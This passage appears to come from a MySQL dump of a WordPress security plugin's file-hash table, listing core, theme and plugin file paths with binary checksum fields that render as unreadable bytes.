\rY_-J�3�q�','k�%�Ҁ�w_3�P�S�٩��5�ڂ\r�G�۞','',0,'?'),('9���Yǚ�2��h�>�','wp-content/themes/wp-simple/assets/images/glyphicons-halflings-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n���8\\.�=�dp�','m-��Q��H���Bw��\r~Q!}\n�L{��6�','',0,'?'),('9�+��9_MW��Y','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/color-palette.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\0�]��\r�uǛ','�E&�VM��>(O��?H-�/#biCB�W','',0,'?'),('9�} B^��?	�\"�','wp-includes/script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',:q���Hn<4���@','���جK��\'��\r<S��K�\"����6i+��9','',0,'?'),('9��)�&��{Sd�G','wp-content/plugins/wp-cerber/assets/wp-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\0i�L�1���_��','��{Ո��R3i²�V���J}��0Ʀ�e\'\n	�','',0,'?'),('9��f&=\0�?�I)���','wp-content/themes/hemingway/content-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�Gc�K胍 p���','<����#������!ֿ�\'��bs�\n��','',0,'?'),('9�8���;�ʥ�q�ɧ�','wp-content/themes/Kent/inc/paginate.php',0,'�5K2��^�%E{��\n','�5K2��^�%E{��\n','���ɣ@F��E��v����x#p��+\n�h���','',0,'?'),('9�h���=���j��[A�','wp-content/themes/monograph/page-templates/fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�|���=�}J�ڝ','eO�P9Tȫ3�����m�A|=���-��','',0,'?'),('9�O�\ZBT$�A`8�','wp-content/themes/quicksand/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����9�G��^T�','��}��%��n������\n��S�g+���','',0,'?'),('9��l�\n	�N[�k4','wp-content/themes/simpleshift/assets/js/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�D\r)��7c���O','�(��B5s�TP���<pt%�FI4�L�RZ_��Y','',0,'?'),('9ĠZq:j\nU�9(\Z\0��','wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�x[��/�؟[�N�','�S���3�hA���Θ����R)�+}�A���6','',0,'?'),('9�<�T:w��Z~�e5��','wp-content/themes/weblog/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9)H�d����','1N�����:�T�X�}������#�����','',0,'?'),('9�{Z�麆N�t�\"�H�','wp-content/themes/catch-responsive/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�Q�U��\Z@���u�x','��A�k�\\A���ɝ4`��ڼCd3#Τ�','',0,'?'),('9ՍҢ��9��d\r�Y','wp-includes/ID3/license.commercial.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n;g��J�g����xA�','�t_2�x�<��-���˜wq�I�g���','',0,'?'),('9שyƣ�hw��','wp-includes/pomo/pomo/entry.php',0,'0�w3aAr���6VH%�2','0�w3aAr���6VH%�2','%���(\'��Q�[����y�B��	�O4AO7','',0,'?'),('9�3��\"�(*�J7','wp-content/themes/metro-magazine/inc/metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Z��A��-.','D��}+*�\r�ԇA���8���eT�8���','',0,'?'),('9د[O��\04y����','wp-content/themes/graphene/loop-children.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6GUcj�\"��,\"d�À','���&��|@x�az��:����3i','',0,'?'),('9�-l&�[s9��=TU','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E���I�c����YF','�[ɇ� �\0[+K��rJ�]��O�r1qM�\"�','',0,'?'),('9��s�3�SZ,p�8g','wp-includes/images/media/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��s��0�ȝ�Q�K','�g��?[��D*�p�8�q���Vѓ�>��N','',0,'?'),('9��WA`�<=7ۭ��','wp-content/themes/catch-flames/inc/panel/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�F�T��o�T*n�k','J����X<P0�3���27S@�⊔Eؒ<��','',0,'?'),(':\n�7M+K��j���>�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/scss_test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�|H:�j���oF�','�\"���Iff��y�[לƵ�24tjU�I����','',0,'?'),(':{���{7�9����','wp-admin/link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�gg��&ёb�� ��','(C<M�d*2Ƚ��*�N�t�n����T~��\ZW','',0,'?'),(':�c�]����t�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/liquibyte.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����`<�IR�IO	�u','����\Z�L�P�`�f%�񰸊K��mz^�0�Z','',0,'?'),(':�|L�H6(��c�g��','wp-includes/ID3/module.audio.ogg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_2��\n$9��`m85','�6%u?E�M��l�Ȑ�@5vr�[�j\'t�H��f','',0,'?'),(':��7�qx8�eI���','wp-content/themes/wp-simple/inc/kirki/kirki/includes/panels/class-kirki-panels-expanded-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0^�\\�c�z��R��','��$�o��Z�X�\'ՍI�k�0�;ov<>�]��','',0,'?'),(':!J�!��5��}3��\nC','wp-content/themes/metro-magazine/images/img1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z_�eLG\rd�$�','�W��\'�K\0��e��a/>D.�$|b)A�#1','',0,'?'),(':1�(�)p]V1�-ȩ�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qDL���a�[	?�$','G�s\0��\r�/1�v=������pS-�yE.��U','',0,'?'),('::���ReA��U #Z','wp-content/themes/catch-responsive/js/source/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rY����ny{���$','��H2L�eV���K�3]T�#�b֑��V�','',0,'?'),(':;��l9چ�gU��Ph','wp-content/themes/education-hub/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��qC�����4','�{�xt�\riQ;j�7G7�R�>�Dь�Z�\"�x3','',0,'?'),(':<�$��0,w\"&e({','wp-includes/class-feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�y�ܫ��]��T','�8��j2�y�N!qʩp�����t\0A��2\\Y','',0,'?'),(':D�J�$�h��Dž\r�','wp-admin/js/customize-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{9�:=��q��aT��','Fb�EE��sn��>����+�o�F�<Zn�','',0,'?'),(':M�>��X�F��l�[�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�%>�̖�a����','�/���+�B��&J�:ť�f�D��J+ ����','',0,'?'),(':\\ܹ\r@���L\"�:�U','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eL�F��T�2Ѯ�He','M��D�\nR卸�X����=���j���н','',0,'?'),(':\\�Jx\\ݏtu9?��U','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/selection/selection-pointer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9N�ǒ�T�G=r�qV�','�9�D��+�db�\n��8\ZS�-O�Q>v���','',0,'?'),(':z�m��t�Ϟ�T8S�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-dimension-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yb~p��˺�>��닄','����Kb�i�f+,j��BwkY���5Ɔ���','',0,'?'),(':���%H`!���\r�Z','wp-admin/js/media-gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K;p�O�?F`h�w','�[��7�2��s���d`��������Mo','',0,'?'),(':��D{�#}zh���F�','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�i�u��n�6���','k�\'��z���Lzm��\rg�gKj_r�e�i躞','',0,'?'),(':��S��#U���h','wp-content/themes/exoplanet/css/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&@=�\'m��2r\"G��v','�z{��}�HZ���R!�P���$�)qH�','',0,'?'),(':��q� �������','wp-content/themes/advance/inc/customizer/sections.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p+)�j�-����~�','C�!�Z�	v�������;N�`9���(`�@5�','',0,'?'),(':���h���wR���d','wp-content/themes/university-hub/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v���T����O/�','�$$g���$��?�0��=*X�v����� ','',0,'?'),(':�x��3�L&�3ſhD','wp-content/plugins/wp-cerber/assets/flags/mz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K����v�)�Q�H�vz','�A�q#7����F�tˎ��Y�\\�j�ň�V:ܯ','',0,'?'),(':�%��(v5��q�0','wp-content/themes/twentytwentyone/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0ײ�O���\r�|��','��a�T��t����.t:��,�v��pڊ\0','',0,'?'),(':�k\na�\0��f����','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K.���\0KL�5�=','�h\Z_���Х_<��r�+j\\���; ��','',0,'?'),(':�˺�+���u��','wp-content/plugins/wordfence/js/Chart.bundle.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5]��d��d�f�','��>��`������NN�`�N\"K�Ӟc�kG<;','',0,'?'),(':ܸ�x��Ӄ������','wp-content/themes/gambit/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������TڷnX=��','U!�_ku4z,�ԑ��􅝶ʉZ�_B�','',0,'?'),(':�M>bB/á=��w\r*}','wp-content/themes/hitmag/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ƣ\Z;�r��','t���ڸ�VӿmW#b�봾�7lb���6�bT�','',0,'?'),(':࿏��P����=.��k','wp-content/themes/wp-simple/inc/kirki/includes/output/property/class-kirki-output-property-background-position.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S���n7����','�a(��J`!�^񧴈~���]|�\"b�i','',0,'?'),(':�4��v	�КY��','wp-content/themes/edge/inc/js/edge-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v2���K8���!=3','�akO�S�$\"���eP0�yF\\+�xo)u�}��','',0,'?'),(':�Xqݝ�J\\�5P�4','wp-includes/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),(':�ṇRM�ti#��=','wp-includes/images/media/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�taCA���.��Z�','�L�>��$��\n�oixoj-\nL�����]G;q','',0,'?'),(';#�	n����%\"���','wp-includes/Requests/Exception/HTTP/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�Y\0�ys��<M','��-!V��>d�*jP�F�	�;QƵ��N1aG�(','',0,'?'),(';�b�fȖ0����x','wp-admin/css/colors/midnight/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';C_�\n����c�K�','}y�Լ�A�lKnIJH�z&NVc���:[3�@n','',0,'?'),(';\r�{���a�Z�X�\\�','wp-content/themes/monograph/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��ֽmDvw,�','� q8�p���Q�%QDe�I�>�z6ؔ��@','',0,'?'),(';ܒscF��!����','wp-includes/css/dist/components/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��y�T�����&]H|�','RU\Z����[�^͝�/��a��/�9�\0�x��','',0,'?'),('; �SӘHl�M*�','wp-content/themes/city-store/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȫ�2��)�4�m�Ѱ�','��c�!)�N�e����jp�w9:�\r�x\Z�','',0,'?'),(';1ы#�Y_N��t�','wp-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���J��ѡ��πi','���8C���P����/��g�e�TCW_��','',0,'?'),(';Rc��J���,�SA','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԯ�#��ɷ��D��','TH�d�����y��x?� �mP��}6�3V','',0,'?'),(';R�yh���RxK�\r','wp-admin/js/farbtastic.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�T�2Aq]����4�','�bt�G�p�\0BM0z�XJv�Z�HAt�M�%','',0,'?'),(';a�/���f9Ae�','wp-content/themes/hitmag/inc/kirki/assets/js/controls/toggle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Љ�Р80�g�c%','����9�MXF��kB�?�u�L�!���b��@','',0,'?'),(';b1�c+�ț ~[�gC','wp-content/themes/saybusiness/inc/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Cξ��;��a3�','�i�A_ü��T%9�hY�	d4H�|���:','',0,'?'),(';eN��-ϒ���0yy	','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/keymap/emacs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_\'„Nn�쫅2s��','ʋ��w��A�3j6�L\Zp�3̞� U�pJ','',0,'?'),(';gX\'�:��,��\'�c','wp-content/themes/education-hub/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�����7/�s���','Y��I��sT�f�h����#��p�S��A�?�\r�','',0,'?'),(';u�^}´�����','wp-content/themes/enigma/css/font-awesome-4.7.0/scss/_path.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���V>	{\\�5`�','���q�Uv��\'8K�R�=�h\"�𷓃�l�','',0,'?'),(';��h8�1�%e҅19','wp-content/themes/university-hub/inc/customizer/home-sections.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�K�9��6��D��+}','�J���־��D��4E�?V�f�;��{�a\\','',0,'?'),(';�o`%�}�!ݱX�;','wp-content/themes/graduate/inc/tgm-plugin/tgm-hook.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�T�Ɖ\r�z���L�','�	�~�Y+��$����d���$X�ơm/[g�','',0,'?'),(';�1�4w�ZF0V��>','wp-content/themes/Yegor/inc/paginate.php',0,'���*C����e��s�a','���*C����e��s�a','n�fH�N?�S!-�����H���q���rHE','',0,'?'),(';�WP�s-�����\"Y�','wp-content/themes/simpleshift/parts/loop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lz��T#���','K�	N��qX �\'�P������l��_����','',0,'?'),(';���Q��O�%��i','wp-content/themes/simpleshift/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P�q#�j��','��:q�@� V�vA�s�\nF����[W�\n��W','',0,'?'),(';���4�[���`�̃','wp-content/plugins/wp-cerber/cerber-lab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ߣ0�SÂ���7~�:A','�ʼnO��V���%Y��UR�L��Tyh1\Z��G7','',0,'?'),(';��P��!�Jx�B�)Lk','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϠX�9K$�fҦ�ϡ','�*��ܖ���,m%����i�[�\"��Ý�C�!','',0,'?'),(';�v�0BK����1д','wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+o~��X��ݓ\0�','xX��ѹ�$6�UdZ$����x�����&3�','',0,'?'),(';؂�8�o�5`PBzu�|','wp-content/themes/wp-simple/assets/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&+��y�\\tO�0�R','s:�XJ�)��h��\\���C��#�D��0�$9�','',0,'?'),(';�Wct���*+��Br�','wp-includes/images/smilies/icon_surprised.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��-��#+����0�?','��cuy�X�ؓ�A��d�5[=w>�*S�pwe�._','',0,'?'),(';�	�P�o�qq�L~','wp-content/themes/quicksand/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��k��Y�)D��','���3��O��Q,n�FCj�@�.�<��]�','',0,'?'),(';����*1\Zn��4�','wp-includes/js/wp-emoji-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' #j��2��\'5�!�gM','����϶.�X���po�I3���fY��cMʲ','',0,'?'),('<�\0Z3�^�Y4�V�','wp-content/themes/the-best/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��͈�����w�wK','���:($K��Ѽ�y�Ϗ�7b���f㓶��','',0,'?'),('<���`.�n����','wp-content/themes/enigma/js/menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u<(uɐ����<�4�','ґB�W~Ά�S��~\r~a�I�H}�d�!�(x6�','',0,'?'),('<\Z\r�\Z!�����K`i','wp-content/plugins/wp-cerber/cerber-common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���y�˖@%��','h66��b�����hS��=��J$���','',0,'?'),('<1R�9MAq��~(<�','wp-content/themes/hitmag/inc/kirki/includes/class-kirki-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�8����G','-�1\"����Cg��>��O	�}�q�ŭ�?���','',0,'?'),('<1^.�����3�=','wp-content/themes/lovecraft/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d*V����H!6����','��\nYꌾ�$W,�4��\"��d��\Z��G','',0,'?'),('<52vDE�-̛�F��','wp-content/themes/gildrest/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)�����b=i��?','�f�/Vc��:�|�B��X)_����_ ����n','',0,'?'),('<?R	��������','wp-content/themes/chronus/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~����g��i?��R<','�+�^E���.Ǽ�4��r��3���{~�.3','',0,'?'),('<FѥY�Jw\"Of;S��','wp-includes/pomo/pomo/po.php',0,'�{K_��eG�@{	/','�{K_��eG�@{	/','�G\n�{2����@k�ٗ��9Բ�1G9��P�','',0,'?'),('<F���Pz�22��~','wp-includes/js/imgareaselect/imgareaselect.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}(��()��3���󵕯','�q�!ݿJӇ��i\n�E�5s�!�\r���%��','',0,'?'),('<R�����FE�wdi�)','wp-content/themes/graphene/images/social/technorati.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���S$cpO�z�+�n!','Θ��i:33��6\\0Q2H�%hD�9BqGE�(r','',0,'?'),('<_-|�@iT�����','wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7UE\Z�,�`𫞈Ó~!','�X���Y�8���kcT��W<+���F2�i','',0,'?'),('<eG�i� =*%ǿš�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-values.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F}X��~e��9#���','P_=&߁���X�Z�ۉ���D��3�i���KM%','',0,'?'),('<y\"v�0p��+\'���','wp-content/plugins/wp-cerber/assets/flags/pw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T���k�	���e�','.�ڜ/��V���eR����x���P�i��_','',0,'?'),('<����.)��ӂ���','wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-add_config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!G�c�~*�gz���x�','\0����&�-�[���1��d�[����F���','',0,'?'),('<�!}K�A�,\r�y�2','wp-content/themes/twentytwentyone/template-parts/header/site-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�z*�-�9�v�Z,��','t���C�����a8f\r*���?�G�\r�G��-','',0,'?'),('<��9�u�j����!�$','wp-admin/css/install.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E.�)��\\�s	��\'','�G4:hu�\'�QN�=;F	״�EQ44��j','',0,'?'),('<���\\\"Pa-��Kj','wp-content/themes/exoplanet/functions/css/chosen-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�\"�+�����6�ח','Sk 1�Q:���ad�DQT��IBx1�F�`IQ��{','',0,'?'),('<�j2�Q��\n�FF�HL�','wp-content/themes/enigma/css/font-awesome-4.7.0/scss/_larger.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y1VooƭV����','�0*?�TW�釧�3�s�<��K@����*Q','',0,'?'),('<����N�T���OL�','wp-content/themes/Kent/archive.php',0,'���>c�6�N�xzY�','���>c�6�N�xzY�','\0�9W���t�[na��]��%��^;��t{R-','',0,'?'),('<ń�g��/�qnV?�','wp-content/themes/graphene/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�U�D7Q�/�����','�̖��<M\'Q=D�K:bI���t^E�p�m�','',0,'?'),('<�/�[U�L�/�@Y�','wp-content/themes/Yegor/FT/plugin/options-framework/js/options-custom.js',0,'=�u�v����\nd��','=�u�v����\nd��','/���!���w�+�Č	cc\\�֎8�a0J�P<D','',0,'?'),('<��$�C�DO��#��','wp-content/plugins/wp-cerber/assets/flags/fj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':���yZd=�\\l���r','C�����ȶ�]�*�s������l湘Jڀ�<e','',0,'?'),('<�hj�	�4���4a�2�','wp-includes/js/utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2���![pNI�5','iII4�*��{FZan�Ǡ�)J,T�&�g��','',0,'?'),('<��u꿖\Zܜ��Y�^','wp-includes/js/tinymce/plugins/wpeditimage/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�<�]�@����	4�','\r]\"��!�\'sg=�����zķQ��2�NK�','',0,'?'),('<�\'����1^�Z�K�','wp-content/themes/Yegor/sponsors.php',0,'�\"J~��\\L�L唣��','�\"J~��\\L�L唣��','��۽�j��#�x�*����Cs���A��!�W7','',0,'?'),('<�l1TmF}m��r��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-file-scan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fRo�l�6��\"���]','�[Z�q�U�r�jM��?O�P��r��t�&','',0,'?'),('<�L�@�ԧ+�2���+','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-accounts-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y?��y*�iE��4}Z','c�����C�Ymd��,�R��p]����rh','',0,'?'),('=�ɥ�t#�Dl�s','wp-content/themes/saybusiness/css/ie8.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8\0�2*��fM)0���','�Nn���K�K�a����\0�֔�\'��ƻ�Gf�','',0,'?'),('=J��ǰja�}LI�Z','wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pF��t1�+���','�;�}��\0[���\'\rq�����ĥd�;#�.','',0,'?'),('=	R���@ֽ��S�� ','wp-content/themes/quicksand/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�\0w���5d�ٻ�*','�&%Q&�\n�+�#Ǔ�ډ�$�ӬeOc�w��','',0,'?'),('=���f;V�dl\"��','wp-admin/css/code-editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���.��y��^J�i�*','{� ������I��^�`��\0�����<<','',0,'?'),('=	]��}��*<.','wp-content/plugins/wordfence/views/waf/waf-install-manual.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=\'mP��x5KbY.�','i�M�Q�����W\r���d�ɸ���','',0,'?'),('=!l�ݽ�t�K���','wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CYTz�Z�9\rwMڲ�>O','ƺ�w���}ee�el����9\0��r���c','',0,'?'),('==����M��h�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/display/placeholder.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��V�/~�Z�E�\n��','�+9=���W�N���O3\r���J��9��','',0,'?'),('==�}*��OK��x7\n�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/neo.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��]�T��9���','z��Q��Y7Y3)ԻQ���v�G��\r�O{H��','',0,'?'),('=@�}��g\r��Zx[<�','wp-content/themes/twentytwenty/.stylelintrc.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#f˭�Jlǿ�','I���l2�S���i.k�R�3�}��8V!<�','',0,'?'),('=A��3�����Zi�-','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n��sn1MQ(��f�','r����J6	Y;U���&��4=�5KQ�ia�','',0,'?'),('=C�5���,��V�(','wp-content/themes/brickyard/docs/assets/blueprint-css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d6	\"��l��)��','4u�����պ����=֎+��e��%����X��','',0,'?'),('=IT�gL�����|','wp-content/themes/city-store/page-templates/home-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#`^&M/�s����','�LH�va^m\Z�E�8��#,������u���','',0,'?'),('=Q|0VR8#��pBJs','wp-content/themes/gildrest/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?�^$waᱫ��','���c�\"��D�;j�h�Tѵ�~qv��]','',0,'?'),('=S�6�a��Xo�,�2','wp-content/plugins/wordfence/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�V8�\\���Bs','7�h�����>8b�ut^^�Rx�26�#i(�','',0,'?'),('=f�u�A><Th���@','wp-includes/js/jquery/ui/progressbar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�sk�����Z�j	Y','���7���v��\r6��1��N9@v�7�$�a��','',0,'?'),('=z�5�\0�������','wp-content/themes/graphene/images/social/buzz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ᗨ�K�Y<����','�d�7	���фb���3�� �	�{�\r���d','',0,'?'),('=}G�y|���#Ny�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/display/autorefresh.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�m�!���СՆ��o','A���e�?R�I\\a�ʌ���Z�Th�V�{�','',0,'?'),('=`�iF],��jG:��','wp-content/themes/edge/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C����\"}� D�R','#�4\"���ʾ����d]c���p0#C0���','',0,'?'),('=��#W�,���Yy�','wp-content/themes/lovecraft/genericons/font/Genericons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�����:�?ě���','\'�p�dy�{��M���Og�@�j�\Z�N','',0,'?'),('=��\0�>B�r�Q]o','wp-content/themes/enigma/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#[��[��\"�y�{l��T','��!*;�\0+s��J�r>�L&usXh@�','',0,'?'),('=������\"��\r